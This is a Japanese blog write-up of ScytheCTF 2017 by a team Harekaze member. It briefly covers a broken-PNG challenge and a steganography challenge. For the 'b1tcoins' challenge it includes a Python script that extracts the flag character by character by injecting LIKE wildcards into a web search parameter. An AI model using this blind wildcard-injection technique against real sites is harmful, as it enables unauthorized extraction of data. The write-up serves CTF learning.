st98 の日記帳


[ctf] ScytheCTF 2017 の write-up

チーム Harekaze で ScytheCTF 2017 に参加しました。最終的にチームで 425 点を獲得し、順位は 7 位 (得点 84 チーム中) でした。うち、私は 2 問を解いて 225 点を入れました。

以下、解いた問題の write-up です。

dead-png (75)

壊れた PNG ファイル…のハズですが、ペイントで読めてしまいました。

b1tcoins (150)

% で検索すると 1338 件が見つかり、CTF{\%} で検索してみると 1 件が見つかりました。1 文字ずつ特定していけばよさそうです。

import requests
import urllib

def check(s):
  c = requests.get('http://hack.bckdr.in/BITCOIN/?search=' + urllib.quote(s)).content
  if '0 results' in c:
    return False
  return True

res = 'CTF{'
t = '0123456789abcdefghijklmnopqrstuvwxyz_'
for _ in range(33):
  for c in t:
    if check(res + c + '%}'):
      res += c
      break
  print res

でフラグが得られました。

(quick challenge (50))

与えられた画像を見ると Reorganize profiles on GitHub, LinkedIn ? と読めました。作問者の GitHub アカウントを漁ってみると jaybosamiya/busysteg が見つかりました。

ただ、手元にこれをビルドできる環境がなく、環境を作るのに時間がかかりそうだったのでチームの Slack に投げたところ、まりこうじさん (@neglect_yp) にやってもらえました。

このエントリーをはてなブックマークに追加
st98.github.io / st98 の日記帳